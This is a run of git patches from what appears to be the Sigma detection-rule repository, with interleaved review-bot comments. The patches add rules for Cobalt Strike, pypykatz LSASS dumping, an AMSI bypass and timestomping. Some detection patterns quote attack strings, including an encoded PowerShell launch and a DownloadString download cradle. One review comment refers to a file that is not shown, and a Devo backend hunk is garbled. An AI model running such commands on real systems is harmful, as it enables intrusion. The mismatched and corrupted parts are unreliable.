cd8c163e-a19b-402e-bdd5-419ff5859f12 +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service +author: Florian Roth +references: + - https://github.com/bats3c/ADCSPwn +date: 2021/07/31 +tags: + - attack.credential_access + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - ' --adcs ' + - ' --port ' + condition: selection +falsepositives: + - unlikely +level: critical 
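Review bot: The new rule lands at `rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml` — a copy-paste filename with a space and the unrelated Dell driver's name — which will trip any path-based tooling and misleads anyone grepping for WinDivert; it should be something like `sysmon_windivert_driver_load.yml`. The description also misspells the driver as `Windiver`. Since both values end in `.sys`, `ImageLoaded|endswith` expresses the intent more precisely than `contains` and avoids matching a longer path such as `\WinDivert.sys.bak`.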
From bda207660d70f2169ab522986b5a8b1d2b7077c9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 31 Jul 2021 12:51:42 +0200 Subject: [PATCH 0155/1367] refactor: modified CobaltStrike service install rule --- .../win_cobaltstrike_service_installs.yml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index 9834aee8..d764e1af 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -4,8 +4,9 @@ description: Detects known malicious service installs that appear in cases in wh author: Florian Roth, Wojciech Lesicki references: - https://www.sans.org/webcasts/119395 + - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ date: 2021/05/26 -modified: 2021/06/03 +modified: 2021/07/31 tags: - attack.execution - attack.privilege_escalation @@ -17,18 +18,24 @@ logsource: product: windows service: system detection: - selection1: + selection_id: EventID: 7045 - selection2: + selection1: ServiceFileName|contains|all: - 'ADMIN$' - '.exe' - selection3: + selection2: ServiceFileName|contains|all: - '%COMSPEC%' - 'start' - 'powershell' - condition: selection1 and (selection2 or selection3) + selection3: + ServiceFileName|contains: + - 'powershell -nop -w hidden -encodedcommand' + selection4: + ServiceFileName|contains|base64offset: + - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" + condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: - Unknown level: critical From 186583f78f3d690840f2269d1e3cbdb460c3b203 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 1 Aug 2021 16:14:51 +0200 Subject: [PATCH 0156/1367] fix the output not the core --- tools/sigma/backends/elasticsearch.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) 
diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 81b367a5..409b0e33 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1370,9 +1370,15 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): def finalize(self): result = "" + rule_lst = [] for rulename, rule in self.elastalert_alerts.items(): - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' + filter_data = rule['filter'] + if filter_data in rule_lst: + pass + else: + result += yaml.dump(rule, default_flow_style=False, width=10000) + result += '\n' + rule_lst.append(filter_data) return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): From 359dd6bbb86b720d4e792a332c4969ccb78e43dc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 1 Aug 2021 19:34:07 +0200 Subject: [PATCH 0157/1367] fix my code --- tools/sigma/backends/elasticsearch.py | 14 ++++---------- tools/sigma/sigmac.py | 28 ++++++++++++++++++++++----- 2 files changed, 27 insertions(+), 15 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 409b0e33..b00a1107 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -300,6 +300,7 @@ class ElasticsearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildca return result else: return super().generateSubexpressionNode(node) + class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into Lucene query string for LogRhythm. Only searches, no aggregations.""" identifier = "es-qs-lr" 
@@ -365,8 +366,7 @@ class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, Elasticsea return result else: return super().generateSubexpressionNode(node) - - + class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into EQL.""" identifier = "es-eql" @@ -1370,15 +1370,9 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): def finalize(self): result = "" - rule_lst = [] for rulename, rule in self.elastalert_alerts.items(): - filter_data = rule['filter'] - if filter_data in rule_lst: - pass - else: - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' - rule_lst.append(filter_data) + result += yaml.dump(rule, default_flow_style=False, width=10000) + result += '\n' return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 50196933..0da400c2 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -33,6 +33,7 @@ from sigma.backends.base import BackendOptions from sigma.backends.exceptions import BackendError, NotSupportedError, PartialMatchError, FullMatchError from sigma.parser.modifiers import modifiers import codecs +import copy sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach()) @@ -249,11 +250,9 @@ def main(): parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) results = parser.generate(backend) - nb_result = len(list(parser.generate(backend))) - if nb_result > 1 : - inc_filenane = 0 - else: - inc_filenane = None + nb_result = len(list(copy.deepcopy(results))) + inc_filenane = None if nb_result < 2 else 0 + newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: 
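Review bot: `nb_result = len(list(copy.deepcopy(results)))` depends on whatever `parser.generate(backend)` returns being deep-copyable; that presumably works today only because the returned object and the iterator it wraps implement `__reduce__`, and it would raise `TypeError` the moment `generate` becomes a generator function. Materialising the results once is simpler and also removes the double evaluation the old code did: `results = list(parser.generate(backend))` followed by `nb_result = len(results)`; the `for result in results:` loop below is unaffected. `main()` continues well past this hunk.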
@@ -275,6 +274,25 @@ def main(): print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) + + if nb_result == 0: # elastalert return "results=[]" so get a error with out not def + if not fileprefix == None and not inc_filenane == None: #yml action + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) + inc_filenane += 1 + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + elif not fileprefix == None and inc_filenane == None: # a simple yml + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml',filename_ext) + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) From 97d2dc89a875ff2269f57ca83aa1c31fb283a335 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 2 Aug 2021 00:25:09 +0200 Subject: [PATCH 0158/1367] fix: order of modifiers --- rules/windows/builtin/win_cobaltstrike_service_installs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index d764e1af..5285feef 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml 
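Review bot: In the new `if nb_result == 0:` block the first branch is unreachable — `inc_filenane` is set to `None` whenever `nb_result < 2`, so `not inc_filenane == None` can never hold when `nb_result == 0` — and the second branch opens `out` with `open(filename, "w", encoding='utf-8')` and then neither writes to nor closes it, leaking the handle and leaving an empty file whose purpose is not stated in code. If the intent is to create an empty output file for a rule that produced no results (the comment hints that elastalert returns an empty list), say so in a comment and do it with a context manager, `with open(filename, "w", encoding='utf-8'): pass`; otherwise drop the block. The variable name is also a typo for `inc_filename`, carried over from the earlier code. The enclosing `main()` starts and ends outside this hunk.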
@@ -33,7 +33,7 @@ detection: ServiceFileName|contains: - 'powershell -nop -w hidden -encodedcommand' selection4: - ServiceFileName|contains|base64offset: + ServiceFileName|base64offset|contains: - "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:" condition: selection_id and (selection1 or selection2 or selection3 or selection4) falsepositives: From 0efe69bd363a7210b61cbfb168258269c8561682 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 08:30:26 +0200 Subject: [PATCH 0159/1367] add poweshell_detect_vm_env.yml --- .../powershell/poweshell_detect_vm_env.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/powershell/poweshell_detect_vm_env.yml diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/poweshell_detect_vm_env.yml new file mode 100644 index 00000000..2e30001f --- /dev/null +++ b/rules/windows/powershell/poweshell_detect_vm_env.yml 
@@ -0,0 +1,31 @@ +title: Powershell Detect Virtualization Environment +id: d93129cd-1ee0-479f-bc03-ca6f129882e3 +status: experimental +author: frack113 +date: 2021/08/03 +description: | + Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. + This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md + - https://techgenix.com/malicious-powershell-scripts-evade-detection/ +tags: + - attack.defense_evasion + - attack.t1497.001 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_action: + ScriptBlockText|contains: Get-WmiObject + selection_module: + ScriptBlockText|contains: + - MSAcpi_ThermalZoneTemperature + - Win32_ComputerSystem + condition: all of selection_* +falsepositives: + - Unknown +level: medium \ No newline at end of file From b5e4b04cb5f72819aceaa7f7af4d8c18c24f7f7e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 10:04:15 +0200 Subject: [PATCH 0160/1367] fix eventid 400 powershell-classic --- .../powershell_alternate_powershell_hosts.yml | 8 +++---- ...powershell_delete_volume_shadow_copies.yml | 6 ++--- .../powershell_remote_powershell_session.yml | 22 ++++++++++++++----- 3 files changed, 21 insertions(+), 15 deletions(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 6346854c..dcf6fb16 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml 
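Review bot: The file is named `poweshell_detect_vm_env.yml` (missing the `r`), unlike the sibling `powershell_*.yml` rules added in this series; rename it before anything references the path. On coverage, `selection_action` matches only `Get-WmiObject`, so the equivalent and now-preferred `Get-CimInstance -ClassName Win32_ComputerSystem` (and the `gwmi`/`gcim` aliases, which 4104 records verbatim) is not detected — adding `- Get-CimInstance`, `- gwmi` and `- gcim` to `selection_action` closes that gap. `Win32_ComputerSystem` queries are also routine in inventory scripts, which is worth recording under `falsepositives` instead of `Unknown`.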
@@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: experimental date: 2019/08/11 -modified: 2021/06/01 +modified: 2021/08/03 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -31,8 +31,7 @@ logsource: service: powershell detection: selection: - EventID: - - 4103 + EventID: 4103 ContextInfo: '*' --- logsource: @@ -40,6 +39,5 @@ logsource: service: powershell-classic detection: selection: - EventID: - - 400 + EventID: 400 ContextInfo: '*' \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index ed6e4d16..b899f3a9 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -11,6 +11,7 @@ tags: status: experimental author: frack113 date: 2021/06/03 +modified: 2021/08/03 logsource: product: windows service: powershell-classic @@ -24,10 +25,7 @@ detection: - 'Delete()' - 'Remove-WmiObject' selection_eventid: - EventID: - - 400 - - 403 - - 600 + EventID: 400 condition: selection_obj and selection_del and selection_eventid fields: - CommandLine diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 80f74507..f2b4587a 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,3 +1,4 @@ +action: global title: Remote PowerShell Session id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions 
@@ -14,17 +15,26 @@ tags: - attack.lateral_movement - attack.t1021.006 - attack.t1028 #an old one +falsepositives: + - Legitimate use remote PowerShell sessions +level: high +--- logsource: product: windows service: powershell detection: selection: - EventID: - - 4103 - - 400 + EventID: 4103 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' condition: selection -falsepositives: - - Legitimate use remote PowerShell sessions -level: high +--- +logsource: + product: windows + service: powershell-classic +detection: + selection: + EventID: 400 + HostName: 'ServerRemoteHost' + HostApplication|contains: 'wsmprovhost.exe' + condition: selection \ No newline at end of file From 85b88c7646d06498fff06e9878a33eace801753d Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 3 Aug 2021 15:06:27 +0545 Subject: [PATCH 0161/1367] Added rule for pypykatz --- ...sysmon_pypykatz_cred_dump_lsass_access.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml diff --git a/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml b/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml new file mode 100644 index 00000000..fa39b72f --- /dev/null +++ b/rules/windows/process_access/sysmon_pypykatz_cred_dump_lsass_access.yml 
@@ -0,0 +1,28 @@ +title: Credential Dumping by Pypykatz +id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b +description: Detects LSASS process access by pypykatz for credential dumping. +status: experimental +date: 2021/08/03 +author: Bhabesh Raj +references: + - https://github.com/skelsec/pypykatz +tags: + - attack.credential_access + - attack.t1003.001 +logsource: + category: process_access + product: windows +detection: + selection: + TargetImage|endswith: '\lsass.exe' + CallTrace|contains|all: + - 'C:\Windows\SYSTEM32\ntdll.dll+' + - 'C:\Windows\System32\KERNELBASE.dll+' + - 'libffi-7.dll' + - '_ctypes.pyd+' + - 'python3*.dll+' # Pypy requires python>=3.6 + GrantedAccess: "0x1FFFFF" + condition: selection +level: critical +falsepositives: + - Unknown \ No newline at end of file From 644fe807869f97d257003346af99887221ad2e2c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 3 Aug 2021 16:01:54 +0200 Subject: [PATCH 0162/1367] add powershell_timestomp.yml --- .../powershell/powershell_timestomp.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/powershell/powershell_timestomp.yml diff --git a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_timestomp.yml new file mode 100644 index 00000000..bc0cb449 --- /dev/null +++ b/rules/windows/powershell/powershell_timestomp.yml 
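Review bot: The CallTrace indicators in the new rule (`_ctypes.pyd+`, `libffi-7.dll`, `python3*.dll+`) describe any CPython ctypes program opening lsass.exe, not pypykatz specifically, so the title and `falsepositives: Unknown` overclaim; I would describe it as `Detects LSASS process access from a Python ctypes-based tool such as pypykatz` and list `Python-based EDR or forensic tooling that reads LSASS memory` as a false positive. The inline comment `# Pypy requires python>=3.6` should read `# pypykatz requires Python >= 3.6`, since PyPy is a different interpreter. The absolute `C:\Windows\SYSTEM32\ntdll.dll+` strings also assume the default SystemRoot and exact Sysmon casing; `\ntdll.dll+` and `\KERNELBASE.dll+` are equally specific here and more portable. Pinning `GrantedAccess` to exactly `0x1FFFFF` means a build that requests a narrower mask is not matched, which is worth a note in the description.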
@@ -0,0 +1,33 @@ +title: Powershell Timestomp +id: c6438007-e081-42ce-9483-b067fbef33c3 +status: experimental +author: frack113 +date: 2021/08/03 +description: | + Adversaries may modify file time attributes to hide new or changes to existing files. + Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md + - https://www.offensive-security.com/metasploit-unleashed/timestomp/ +tags: + - attack.defense_evasion + - attack.t1070.006 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_ioc: + ScriptBlockText|contains: + - '.CreationTime =' + - '.LastWriteTime =' + - '.LastAccessTime =' + - '[IO.File]::SetCreationTime' + - '[IO.File]::SetLastAccessTime' + - '[IO.File]::SetLastWriteTime' + condition: selection_id and selection_ioc +falsepositives: + - legitime admin script +level: medium \ No newline at end of file From 692bc9a63ac62c1b8c6bf373af1dd05596a283d6 Mon Sep 17 00:00:00 2001 From: eocete Date: Wed, 4 Aug 2021 08:52:32 +0200 Subject: [PATCH 0163/1367] Added support for multicondition rules using Devo subqueries --- tools/sigma/backends/devo.py | 41 ++++++++++++++++++++++++++++---- tools/tests/test_backend_devo.py | 25 +++++++++++++++++++ 2 files changed, 62 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/devo.py b/tools/sigma/backends/devo.py index aeca596f..3d6db147 100644 --- a/tools/sigma/backends/devo.py +++ b/tools/sigma/backends/devo.py 
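Review bot: The `[IO.File]::Set*Time` strings in `selection_ioc` miss the fully-qualified `[System.IO.File]::SetCreationTime` form because the leading `[` breaks the substring match; dropping the bracket, e.g. `- 'IO.File]::SetCreationTime'`, `- 'IO.File]::SetLastAccessTime'`, `- 'IO.File]::SetLastWriteTime'`, covers both spellings and still matches the `*Utc` variants. Likewise `'.CreationTime ='` requires a space before `=` and is defeated by `$f.CreationTime=$d`, so both spellings need listing or the limitation should be noted in the description. `falsepositives: - legitime admin script` should read `- Legitimate administrative scripts`.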
@@ -53,6 +53,7 @@ class DevoBackend(SingleTextQueryBackend): reEscape = re.compile('("|(? 1: + self.hasMulticondition = True + else: + self.hasMulticondition = False + + results = [] for parsed in sigmaparser.condparsed: # Multi condition rules are not supported yet, only the first one will be processed query = self.generateQuery(parsed) @@ -251,4 +271,17 @@ class DevoBackend(SingleTextQueryBackend): if after is not None: result += after - return result \ No newline at end of file + results.append(result) + + if self.hasMulticondition: + prefix = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link where ' + suffix = " select *" + for i in range(len(results)): + results[i] = "subquery_link in ( " + results[i] + results[i] += ")" + + body = " or ".join(results) + + return prefix + body + suffix + + return results[0] diff --git a/tools/tests/test_backend_devo.py b/tools/tests/test_backend_devo.py index 9dd412b7..4d6c1a6a 100644 --- a/tools/tests/test_backend_devo.py +++ b/tools/tests/test_backend_devo.py 
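Review bot: `return results[0]` at the end of `generate` raises `IndexError` when `sigmaparser.condparsed` is empty, and the loop comment `# Multi condition rules are not supported yet, only the first one will be processed` (a context line in the earlier hunk, partly garbled in this rendering) is now false since every condition is processed. I would guard the final return, e.g. `if not results: raise NotImplementedError("rule has no condition")` (or whatever the base backend returns for an empty rule), and rewrite the comment to `# each parsed condition becomes one query; several are joined as Devo subqueries below`. The `group every 24h` window in the multi-condition prefix is hard-coded rather than taken from the rule, which deserves a comment if intentional. The `generate` method's signature and the `reEscape` change start outside this hunk.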
@@ -214,6 +214,31 @@ class TestDevoBackend(unittest.TestCase): # Act & Assert self.validate(detection, expected_result) + def testMulticondition(self): + # Arrange + detection = {"selection1": {"fieldname1": "value1"}, + "selection2": {"fieldname2": "value2"}, + "condition": ["selection1", "selection2"]} + expected_result = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link' \ + ' where subquery_link in ( from ' + self.table + \ + ' where fieldname1 = "value1" select "link" as subquery_link) or subquery_link in ( from ' + self.table + \ + ' where fieldname2 = "value2" select "link" as subquery_link) select *' + # Act & Assert + self.validate(detection, expected_result) + + def testMulticonditionAgg(self): + # Arrange + detection = {"selection1": {"fieldname1": "value1"}, + "selection2": {"fieldname2": "value2"}, + "condition": ["selection1 | count(fieldname1) by fieldname2 > 3", "selection2 | count(fieldname3) by fieldname4 > 3"]} + expected_result = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link' \ + ' where subquery_link in ( from ' + self.table + ' where fieldname1 = "value1" select "link" as' \ + ' subquery_link group every - by subquery_link,fieldname2 select count(fieldname1) as agg where agg > 3 select *)' \ + ' or subquery_link in ( from ' + self.table + ' where fieldname2 = "value2" select "link" as ' \ + 'subquery_link group every - by subquery_link,fieldname4 select count(fieldname3) as agg where agg > 3 select *) select *' + # Act & Assert + self.validate(detection, expected_result) + def validate(self, detection, expectation): config = SigmaConfiguration() From 994701bd8ea53019b554ce8e36699429c2213c0a Mon Sep 17 00:00:00 2001 
From: phantinuss Date: Wed, 4 Aug 2021 11:28:58 +0200 Subject: [PATCH 0164/1367] CobaltStrike injected AMSI bypass --- .../sysmon_injected_amsi_bypass.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_access/sysmon_injected_amsi_bypass.yml diff --git a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml b/rules/windows/process_access/sysmon_injected_amsi_bypass.yml new file mode 100644 index 00000000..d8e898ae --- /dev/null +++ b/rules/windows/process_access/sysmon_injected_amsi_bypass.yml @@ -0,0 +1,24 @@ +title: CobaltStrike BOF Injecting AMSI Bypass +id: 09706624-b7f6-455d-9d02-adee024cee1d +description: Detects the usage of a CobaltStrike BOF which injects an AMSI Bypass +references: + - https://github.com/boku7/injectAmsiBypass +status: experimental +author: Christian Burkard +date: 2021/08/04 +logsource: + category: process_access + product: windows +detection: + selection: + CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' + GrantedAccess: '0x1028' + condition: selection +falsepositives: + - unkown +level: high +tags: + - attack.execution + - attack.t1106 + - attack.defense_evasion + - attack.t1562.001 From f040725dd85e9f64cb1a0c7a8ad911de3b9bc49e Mon Sep 17 00:00:00 2001 
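Review bot: `falsepositives: - unkown` in the new rule is a typo for `- Unknown`. The `CallTrace|re` pattern with `[a-z0-9]{4,6}` offsets and `UNKNOWN\([A-Z0-9]{16}\)` pins Sysmon's exact call-trace formatting, and the `re` modifier is only honoured by backends with regex support, so the rule silently does nothing on others; a `logsource` note such as `definition: 'Requires a backend with regex support; CallTrace format as emitted by Sysmon'` would make that dependency explicit. Whether 4-6 hex digits hold for the ntdll/KERNELBASE offsets across builds is worth confirming against a few samples before relying on the `^`/`$` anchors.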
From: frack113 Date: Wed, 4 Aug 2021 14:49:50 +0200 Subject: [PATCH 0165/1367] fix EventID: 4104 ScriptBlockText --- .../powershell/powershell_CL_Invocation_LOLScript.yml | 1 + .../powershell/powershell_CL_Invocation_LOLScript_v2.yml | 1 + .../powershell/powershell_CL_Mutexverifiers_LOLScript.yml | 1 + .../powershell_CL_Mutexverifiers_LOLScript_v2.yml | 1 + rules/windows/powershell/powershell_accessing_win_api.yml | 7 ++++--- .../windows/powershell/powershell_automated_collection.yml | 1 - .../powershell/powershell_clear_powershell_history.yml | 1 + rules/windows/powershell/powershell_create_local_user.yml | 6 +++--- .../windows/powershell/powershell_decompress_commands.yml | 1 + rules/windows/powershell/powershell_dnscat_execution.yml | 1 + rules/windows/powershell/powershell_get_clipboard.yml | 1 + rules/windows/powershell/powershell_icmp_exfiltration.yml | 1 + .../powershell/powershell_invoke_obfuscation_clip+.yml | 1 + .../powershell_invoke_obfuscation_obfuscated_iex.yml | 1 + .../powershell/powershell_invoke_obfuscation_stdin+.yml | 1 + .../powershell/powershell_invoke_obfuscation_var+.yml | 1 + .../powershell_invoke_obfuscation_via_compress.yml | 1 + .../powershell_invoke_obfuscation_via_rundll.yml | 1 + .../powershell/powershell_invoke_obfuscation_via_stdin.yml | 1 + .../powershell_invoke_obfuscation_via_use_clip.yml | 1 + .../powershell_invoke_obfuscation_via_use_mhsta.yml | 1 + .../powershell_invoke_obfuscation_via_use_rundll32.yml | 1 + .../powershell/powershell_invoke_obfuscation_via_var++.yml | 1 + rules/windows/powershell/powershell_prompt_credentials.yml | 4 ++-- .../powershell_suspicious_export_pfxcertificate.yml | 4 ++-- .../powershell/powershell_suspicious_getprocess_lsass.yml | 4 ++-- .../powershell_suspicious_mounted_share_deletion.yml | 1 + rules/windows/powershell/win_powershell_web_request.yml | 1 + 28 files changed, 35 insertions(+), 13 deletions(-) 
diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml index 4189204e..3976c19f 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml index c8b63179..5cd1d3ad 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml index 341b51f7..a9e742a2 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml index c4b47e1b..8a0fa3a3 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection2: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml index 6fdcc095..aa74974e 100644 --- a/rules/windows/powershell/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_accessing_win_api.yml @@ -4,6 +4,7 @@ status: experimental description: Detecting use WinAPI Functions in PowerShell author: Nikita Nazarov, oscd.community date: 2020/10/06 +modified: 2021/08/04 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: @@ -13,11 +14,11 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: - EventID: - - 4104 - Message|contains: + EventID: 4104 + ScriptBlockText|contains: - 'WaitForSingleObject' - 'QueueUserApc' - 'RtlCreateUserThread' diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml index b3e00512..d482a22b 100644 --- a/rules/windows/powershell/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_automated_collection.yml @@ -32,7 +32,6 @@ detection: - 'Get-ChildItem' - ' -Recurse ' - ' -Include ' - condition: all of them falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index 695c01d0..e937037d 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_create_local_user.yml index d2ef2c64..6fd05f5c 100644 --- a/rules/windows/powershell/powershell_create_local_user.yml 
